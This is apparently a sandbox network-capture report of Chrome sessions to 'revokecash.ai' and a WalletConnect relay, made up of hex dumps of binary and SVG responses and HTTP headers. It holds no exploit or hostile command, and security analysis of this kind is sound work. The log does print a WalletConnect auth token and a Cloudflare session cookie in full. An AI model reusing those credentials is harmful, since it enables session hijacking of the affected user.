                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 0c 03 01 00 02 10 03 10 00 00 00 ed f9 5d 33 2f f9 5f dc e7 b4 9d a6 23 93 e0 1c 67 7a e0 df a7 3c 79 24 f6 33 04 84 62 66 44 b0 e0 20 d0 38 01 ca 09 2c 92 b4 4d b3 00 be 64 93 a2 66 cd 81 38 9d 1c 87 af c3 b8 75 f2 ea b9 1d 8e 9e ce bd 43 d1 e6 cd fd 1a 88 c0 6e bc d3 e6 12 e8 5c e3 b8 f0 ef 1a d6 19 7b 18 15 5d 29 81 13 15 a9 02 24 00 89 00 25 95 c1 9d 6c 8a 97 57 06 75 78 c6 5e 1d 0f 66 43 ea de 6d dc 1b a1 f7 3e 2b cf bf 0f a2 76 ef 47 a1 f0 bf 2a f9 76 dd 55 7a ba 96 e4 25 4c 5a 83 aa 1d 5b ad 6c 86 ea 5b 54 2b 1a 07 f7 07 af 55 dc 7f 34 7d 17 d9 4f cf 5d 07 de f9 be 0f a1 7a fc 9f 55 f3 64 93 b2 92 66 45 13 b0 e1 99 e7 87 81 2c 30 09 0c 39 21 25 93 82 4b ac 24 9b e4 4c 36 8b 6c f7 63 b6 0e 27 53 1b d0 f9 86 e9 ed 34 63 b2 db cf 61 f7 9d 1e 01 a7 77
                                                                          Data Ascii: ]3/_#gz<y$3bfD 8,Mdf8uCn\{])$%lWux^fCm>+vG*vUz%LZ[l[T+U4}O]zUdfE,09!%K$L6lc'S4caw
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: ba 90 80 08 80 20 80 44 80 03 43 22 5a 1c 94 bc 59 06 3c bc 45 7c c7 5d aa 1c 31 bb cd 25 5c 3a 7b ae a5 3b 39 b9 6c 57 7d 43 82 45 b1 1a 88 65 02 20 13 35 62 37 6c 0e 33 6a e3 fa 05 e9 1c 6b c9 cb 97 43 d5 b0 96 5b 0e 8b 95 e5 39 0c eb 4d 65 3d ef 9b 79 50 1c 59 13 4a c8 9a 54 07 14 22 c2 81 31 00 e6 22 07 30 40 c9 59 1c b2 ba b5 ac 8b e3 a0 b5 fd 0b 5d 0f ea ce 97 6b 0b 9e 0a b5 da 73 3e 09 43 1f 4f b7 cf 2c be 6a ee ac a2 b0 14 48 04 00 04 80 12 ea f1 6c eb 62 6d 64 59 09 b7 75 cb 6a 39 1e d9 ce f0 9a c7 66 9d c6 74 e8 da f6 bd d3 43 d7 71 6a ef bc da 7a 05 7c ee 2a bb 96 a3 cd dd 42 5e 8c a6 2c 47 1a c9 56 80 81 35 b4 48 6d 5a fd 39 de 57 77 01 3e ff 00 15 76 b6 4e 3d c6 6d 0c 89 f4 bc 11 94 71 60 02 65 40 79 49 13 88 03 0a 03 44 40 48 a0 e6 20 09 95
                                                                          Data Ascii: DC"ZY<E|]1%\:{;9lW}CEe 5b7l3jkC[9Me=yPYJT"1"0@Y]ks>CO,jHlbmdYuj9ftCqjz|*B^,GV5HmZ9Ww>vN=mq`e@yID@H
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 3b ea 73 d5 15 d8 38 c3 85 ee 78 d8 6d f4 68 52 8d 74 01 ac 55 f2 8b 79 fd 2d a0 f1 d8 0d c1 d8 9f 46 49 a1 07 8c 4c a2 93 0e fd e6 ea 3b a1 bb c5 4d eb 0d d1 69 b0 a9 7b 92 e0 1b a8 db d7 51 cc c3 77 c2 81 4d 41 19 11 0e 89 87 d6 56 b2 54 a3 b4 c4 ac a0 6e f3 ee 0d 46 85 69 bd 5b 13 08 aa 9d 71 f7 31 a1 bc 78 a8 e4 22 55 57 56 a9 95 e3 a3 37 bb 55 b2 2d 46 5b 6e 79 f4 ec 2a bc 3b 15 ad 16 49 ac ec 91 d8 ec 95 c3 da 88 71 17 16 a4 f5 54 47 b0 d3 d1 ec 52 9e 78 fd 73 cc 7b 22 c8 98 a2 8b 44 e0 71 4f 6c 5b 6b d2 4e 32 c7 aa 94 df 57 7e 02 2c e4 a5 2b 0a f1 1b 38 c4 98 9b 6d 05 0e cd 69 52 10 52 84 0a e6 4d 6f 1a ed 8b 36 cf 7d a5 ad 6a 37 6a 4e a7 0e 31 6e b7 a3 9f 61 7d 63 74 f6 18 52 68 48 dc 7c ec a4 e3 73 0d de 4f 78 dd 0c 0c 09 8b 41 8e 51 bf 36 b4 55
                                                                          Data Ascii: ;s8xmhRtUy-FIL;Mi{QwMAVTnFi[q1x"UWV7U-F[ny*;IqTGRxs{"DqOl[kN2W~,+8miRRMo6}j7jN1na}ctRhH|sOxAQ6U
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 90 69 8f 6c 59 0c cc 2d f4 28 64 92 31 a4 4c 3b 76 86 99 15 2a 9c 02 4c 39 69 4c a9 77 8a cd 68 32 55 22 c9 9a 54 c4 b6 be 75 29 3c 62 69 ad 1b 93 43 62 18 74 78 d2 2d 91 76 61 b4 75 59 47 a0 61 f6 7b 32 cf bd f5 6d 2d 7d 83 0f 6e 50 2c 2b 46 95 d1 01 da a1 58 7e 4a 65 9f ac 69 49 1b f6 7b 47 f1 cb 60 d4 ca b7 35 17 05 e4 8c 30 4a 47 84 59 16 0b 08 65 0e 3c 9b ca 22 b7 4e 43 b6 26 ad 16 da c1 28 52 bb 30 11 23 3b a7 0a bd d3 dd b2 ef 0f 8c 2e c8 64 b9 50 ba 0d c5 35 80 f3 12 52 b5 18 01 5a 7d e3 0a ab 88 9b fb c1 91 fd 6b c6 2d ef f6 93 a3 aa 12 9f 0f b7 1a b3 26 97 b0 24 7d e3 02 cc 92 6a 86 62 68 0e 03 0f 7c 22 d3 b0 e5 d4 03 32 a5 d5 ec a8 a9 ff 00 aa 17 68 db af 26 a8 97 44 ba 3a cb c3 df f2 85 3b 30 4e b5 b2 dd ee 18 8f 68 84 da 36 94 b2 6f b8 51 30
                                                                          Data Ascii: ilY-(d1L;v*L9iLwh2U"Tu)<biCbtx-vauYGa{2m-}nP,+FX~JeiI{G`50JGYe<"NC&(R0#;.dP5RZ}k-&$}jbh|"2h&D:;0Nh6oQ0
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 2f a9 33 6e a9 42 a0 50 63 be 24 6c bb 4d 99 b2 50 db 45 f6 6e ab 44 a5 02 48 3b 46 31 6b c8 38 fc dc b8 43 68 44 d3 8c a9 c9 86 c2 f0 0a 1c 77 c5 8c e2 51 25 2a 97 9c 68 3c bb c6 44 a8 56 e0 23 6e e0 4e 51 65 32 99 e6 d5 27 32 ba 39 2b 31 a6 35 35 aa 09 fa 40 7b e2 cb 72 72 7a 6e 6e 71 2e 3b a1 0b ae 89 0b ba 56 40 d5 4e cd 99 c5 ac e4 f2 e7 56 a9 b4 94 ba 40 37 70 c1 3b 00 a6 c8 b1 de 90 65 fd 24 c8 5a ae f4 12 05 45 77 98 b5 1d b2 9c 93 6e 6e 61 9b f5 4f d1 a5 5d 23 5c 69 0b 50 52 89 09 09 a9 e8 8c 87 0f 23 d9 8f 41 93 45 e7 d3 c3 18 5a af 4c cc 39 d4 4d 07 6e 51 2e c2 d6 b4 a5 bc 4f aa 3e 50 b6 16 dd 02 92 52 4e fc 0c 59 9c a0 65 a6 83 45 80 94 a4 61 74 e2 7b 61 a9 84 3a d8 5a 0d 41 8d 54 4c 04 e4 97 72 e0 a1 13 f3 ce 3e f6 0a ad 4e 03 77 08 6e 60 d4
                                                                          Data Ascii: /3nBPc$lMPEnDH;F1k8ChDwQ%*h<DV#nNQe2'29+155@{rrznnq.;V@NV@7p;e$ZEwnnaO]#\iPR#AEZL9MnQ.O>PRNYeEat{a:ZATLr>Nwn`
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 50 fe 5a b3 fc a7 6c 29 28 52 2f b7 d1 da 36 88 22 0c 1f 3f c9 8b 35 0f cc 29 f7 7e a9 8c 71 c8 ab 3f 0c e1 f9 b4 5a 33 2e ce 3f 5e 67 2f 82 51 d7 27 24 f6 ab 6c 4d cd 3d 34 fa 9d 70 e2 70 03 62 46 e1 c3 c8 d4 a9 38 ab 01 bb 6c 4e 25 a4 94 a5 09 a5 06 27 b6 18 67 48 af ba 33 31 7b 58 70 87 93 75 d5 8f bc 61 b6 2f 21 4a 27 61 a4 4a a9 33 4c 89 37 4e 23 fd 5d 67 d5 3d 43 c0 c5 9c ff 00 ed 09 27 24 e6 30 79 ac 89 cf 0d bd d9 18 5a 14 95 14 a8 50 83 42 3e c9 10 20 42 dd 2d a0 21 26 8b 58 d6 57 55 30 56 a7 54 94 21 26 e8 e8 a7 e2 78 c7 36 a6 0a 49 10 99 06 d5 0c f2 71 f7 93 56 ca 69 bd 46 90 79 20 f2 5b 2a 54 c2 2a 05 68 12 4e 5c 70 86 26 14 0e 93 68 1f 48 3a c9 df da 22 61 bb aa c3 23 88 ec 83 06 0f 9e b4 d4 a9 2b 15 89 34 7d 63 dd 2a 6d ae 7e d3 84 5a 8a 0d
                                                                          Data Ascii: PZl)(R/6"?5)~q?Z3.?^g/Q'$lM=4ppbF8lN%'gH31{Xpua/!J'aJ3L7N#]g=C'$0yZPB> B-!&XWU0VT!&x6IqViFy [*T*hN\p&hH:"a#+4}c*m~Z


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          62192.168.2.549784104.21.1.2284435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:30 UTC589OUTGET /_img/notcommon.svg HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://revokecash.ai/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:30 UTC709INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 39 35 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 30 3a 30 37 3a 33 38 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 62 38 66 2d 31 38 63 35 33 33 32 35 61 32 30
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:30 GMTContent-Type: image/svg+xmlContent-Length: 2959Connection: closeX-Powered-By: ExpressCache-Control: public, max-age=14400Last-Modified: Sun, 10 Dec 2023 10:07:38 GMTETag: W/"b8f-18c53325a20
                                                                          2023-12-10 16:44:30 UTC660INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 68 65 69 67 68 74 3d 22 31 30 35 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 37 20 31 30 35 22 20 77 69 64 74 68 3d 22 32 34 37 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 61 22 3e 3c 70 61 74 68 20 64 3d 22 6d 32 30 20 32 30 68 36 35 76 36 35 68 2d 36 35 7a 22 2f 3e 3c 2f 63 6c 69 70 50 61 74 68 3e 3c 72 65 63 74 20 66 69 6c 6c 3d 22 23 30 30 30 22 20 68 65 69 67 68 74 3d 22 31 30 35 22 20 72 78 3d 22 31 32 2e 39 38 37 37 22 20 77 69 64 74 68 3d 22 32 34 36 2e 30
                                                                          Data Ascii: <svg fill="none" height="105" viewBox="0 0 247 105" width="247" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><clipPath id="a"><path d="m20 20h65v65h-65z"/></clipPath><rect fill="#000" height="105" rx="12.9877" width="246.0
                                                                          2023-12-10 16:44:30 UTC1369INData Raw: 32 2e 33 39 35 37 76 37 2e 36 6c 2d 35 2e 34 2d 37 2e 36 68 2d 32 2e 34 76 31 34 68 33 2e 32 76 2d 37 2e 36 6c 35 2e 34 20 37 2e 36 68 32 2e 34 76 2d 31 34 7a 22 2f 3e 3c 70 61 74 68 20 64 3d 22 6d 31 31 39 2e 38 37 38 20 33 36 2e 36 37 35 37 63 34 2e 30 32 20 30 20 37 2e 32 38 2d 33 2e 31 36 20 37 2e 32 38 2d 37 2e 32 38 73 2d 33 2e 32 36 2d 37 2e 32 38 2d 37 2e 32 38 2d 37 2e 32 38 2d 37 2e 32 38 20 33 2e 31 36 2d 37 2e 32 38 20 37 2e 32 38 20 33 2e 32 36 20 37 2e 32 38 20 37 2e 32 38 20 37 2e 32 38 7a 6d 30 2d 33 2e 31 32 63 2d 32 2e 32 38 20 30 2d 34 2e 30 38 2d 31 2e 36 36 2d 34 2e 30 38 2d 34 2e 31 36 73 31 2e 38 2d 34 2e 31 36 20 34 2e 30 38 2d 34 2e 31 36 20 34 2e 30 38 20 31 2e 36 36 20 34 2e 30 38 20 34 2e 31 36 2d 31 2e 38 20 34 2e 31 36 2d 34
                                                                          Data Ascii: 2.3957v7.6l-5.4-7.6h-2.4v14h3.2v-7.6l5.4 7.6h2.4v-14z"/><path d="m119.878 36.6757c4.02 0 7.28-3.16 7.28-7.28s-3.26-7.28-7.28-7.28-7.28 3.16-7.28 7.28 3.26 7.28 7.28 7.28zm0-3.12c-2.28 0-4.08-1.66-4.08-4.16s1.8-4.16 4.08-4.16 4.08 1.66 4.08 4.16-1.8 4.16-4
                                                                          2023-12-10 16:44:30 UTC930INData Raw: 2d 32 39 2e 31 36 32 31 7a 22 2f 3e 3c 70 61 74 68 20 64 3d 22 6d 31 32 30 2e 38 33 31 20 38 32 2e 38 38 34 36 76 2d 33 38 2e 32 30 38 38 68 31 32 2e 36 36 35 76 34 2e 36 32 39 37 68 2d 37 2e 35 35 36 76 31 31 2e 36 30 31 68 36 2e 37 30 35 76 34 2e 36 32 39 38 68 2d 36 2e 37 30 35 76 31 32 2e 37 31 38 35 68 37 2e 35 35 36 76 34 2e 36 32 39 38 7a 22 2f 3e 3c 70 61 74 68 20 64 3d 22 6d 31 33 37 2e 31 34 39 20 34 34 2e 36 37 35 38 68 31 30 2e 30 30 35 63 33 2e 39 30 32 20 30 20 35 2e 38 35 33 20 32 2e 31 38 31 38 20 35 2e 38 35 33 20 36 2e 35 34 35 35 76 39 2e 34 31 39 31 63 30 20 33 2e 33 33 34 39 2d 31 2e 30 31 31 20 35 2e 34 34 35 38 2d 33 2e 30 33 33 20 36 2e 33 33 32 37 6c 33 2e 35 36 35 20 31 35 2e 39 31 31 35 68 2d 34 2e 38 34 32 6c 2d 33 2e 33 35 33
                                                                          Data Ascii: -29.1621z"/><path d="m120.831 82.8846v-38.2088h12.665v4.6297h-7.556v11.601h6.705v4.6298h-6.705v12.7185h7.556v4.6298z"/><path d="m137.149 44.6758h10.005c3.902 0 5.853 2.1818 5.853 6.5455v9.4191c0 3.3349-1.011 5.4458-3.033 6.3327l3.565 15.9115h-4.842l-3.353


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          63192.168.2.549786104.21.1.2284435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:30 UTC582OUTGET /_img/en.svg HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://revokecash.ai/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:30 UTC710INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 30 3a 30 37 3a 33 38 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 31 66 63 2d 31 38 63 35 33 33 32 35 61 31 63 22
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:30 GMTContent-Type: image/svg+xmlContent-Length: 508Connection: closeX-Powered-By: ExpressCache-Control: public, max-age=14400Last-Modified: Sun, 10 Dec 2023 10:07:38 GMTETag: W/"1fc-18c53325a1c"
                                                                          2023-12-10 16:44:30 UTC508INData Raw: 3c 73 76 67 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 31 32 20 35 31 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 6d 30 20 30 68 35 31 32 76 35 31 32 68 2d 35 31 32 7a 22 20 66 69 6c 6c 3d 22 23 30 31 32 31 36 39 22 2f 3e 3c 70 61 74 68 20 64 3d 22 6d 35 31 32 20 30 76 36 34 6c 2d 31 39 30 20 31 39 32 20 31 39 30 20 31 38 37 76 36 39 68 2d 36 37 6c 2d 31 39 31 2d 31 38 38 2d 31 38 36 20 31 38 38 68 2d 36 38 76 2d 36 38 6c 31 38 36 2d 31 38 37 2d 31 38 36 2d 31 38 33 76 2d 37 34 68 36 32 6c 31 39 32 20 31 38 38 20 31 38 36 2d 31 38 38 7a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 61 74 68 20 64 3d 22 6d 31 38 34 20 33 32 34 20 31 31 20 33 34 2d 31 35
                                                                          Data Ascii: <svg viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="m0 0h512v512h-512z" fill="#012169"/><path d="m512 0v64l-190 192 190 187v69h-67l-191-188-186 188h-68v-68l186-187-186-183v-74h62l192 188 186-188z" fill="#fff"/><path d="m184 324 11 34-15


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          64192.168.2.549789104.21.1.2284435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:31 UTC638OUTGET /init HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Accept: application/json, text/javascript, */*; q=0.01
                                                                          X-Requested-With: XMLHttpRequest
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://revokecash.ai/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          If-None-Match: W/"c-rDu2skaeL3muTsdSOt0zV7fI+kc"
                                                                          2023-12-10 16:44:31 UTC572INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 34 20 4e 6f 74 20 4d 6f 64 69 66 69 65 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 45 54 61 67 3a 20 57 2f 22 63 2d 72 44 75 32 73 6b 61 65 4c 33 6d 75 54 73 64 53 4f 74 30 7a 56 37 66 49 2b 6b 63 22 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 45 49 6b 77
                                                                          Data Ascii: HTTP/1.1 304 Not ModifiedDate: Sun, 10 Dec 2023 16:44:31 GMTConnection: closeX-Powered-By: ExpressETag: W/"c-rDu2skaeL3muTsdSOt0zV7fI+kc"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EIkw


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          65192.168.2.54979052.205.234.2094435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:31 UTC1211OUTGET /?auth=eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkaWQ6a2V5Ono2TWt0cWZHOEFlMTE1M1k2TnBrTmZUVk1XYUo4YUs3dFRwbTRwMzJydWhUZFExWCIsInN1YiI6ImVkYjNmNWI5YjU0YjcwOTc3MGI3ZmFhMzVjMWQxNGZhZjg2MGMwZjY1NWQwZDJkMDg1MWE2MTNiZDMzNWVkYmQiLCJhdWQiOiJ3c3M6Ly9yZWxheS53YWxsZXRjb25uZWN0LmNvbSIsImlhdCI6MTcwMjIyNjY2OSwiZXhwIjoxNzAyMzEzMDY5fQ.f-2JaT4aS5waFXxJLIZtdIHQjpTzrTWyftvRNtMXZmcE73M8B8WIqt9_DRx7Pkh1EEllzj92AS0ex4X8upvGBA&projectId=4de540f0804c83871ac4d89ebb9031e9&ua=wc-2%2Fjs-2.9.0%2Fwindows10-chrome-117.0.0%2Fbrowser%3Arevokecash.ai&useOnCloseEvent=true HTTP/1.1
                                                                          Host: relay.walletconnect.com
                                                                          Connection: Upgrade
                                                                          Pragma: no-cache
                                                                          Cache-Control: no-cache
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Upgrade: websocket
                                                                          Origin: https://revokecash.ai
                                                                          Sec-WebSocket-Version: 13
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __cf_bm=YD94S42W_KZc1cIu43JNqSDqDzEjxJ6AqgPFYIoGAKo-1702226668-0-AcY4kZecMvVNd+2tgdWY5r22mxpAQEy0KOOmd18EKhqfPvIJVvUXHP/xzAbRSEMG58Cp6YfKrfnMAnSxgQkXDLA=
                                                                          Sec-WebSocket-Key: z9qWf75BxX8qOkXN9O4jLA==
                                                                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                          2023-12-10 16:44:31 UTC126INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 34 33 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 33 30 20 47 4d 54 0d 0a 0d 0a
                                                                          Data Ascii: HTTP/1.1 400 Bad Requestcontent-type: text/plain; charset=utf-8content-length: 43date: Sun, 10 Dec 2023 16:44:30 GMT
                                                                          2023-12-10 16:44:31 UTC43INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 75 70 67 72 61 64 65 27
                                                                          Data Ascii: Connection header did not include 'upgrade'


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          66192.168.2.549791172.67.152.1054435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:31 UTC355OUTGET /_img/notcommon.svg HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:32 UTC711INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 39 35 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 30 3a 30 37 3a 33 38 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 62 38 66 2d 31 38 63 35 33 33 32 35 61 32 30
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:31 GMTContent-Type: image/svg+xmlContent-Length: 2959Connection: closeX-Powered-By: ExpressCache-Control: public, max-age=14400Last-Modified: Sun, 10 Dec 2023 10:07:38 GMTETag: W/"b8f-18c53325a20
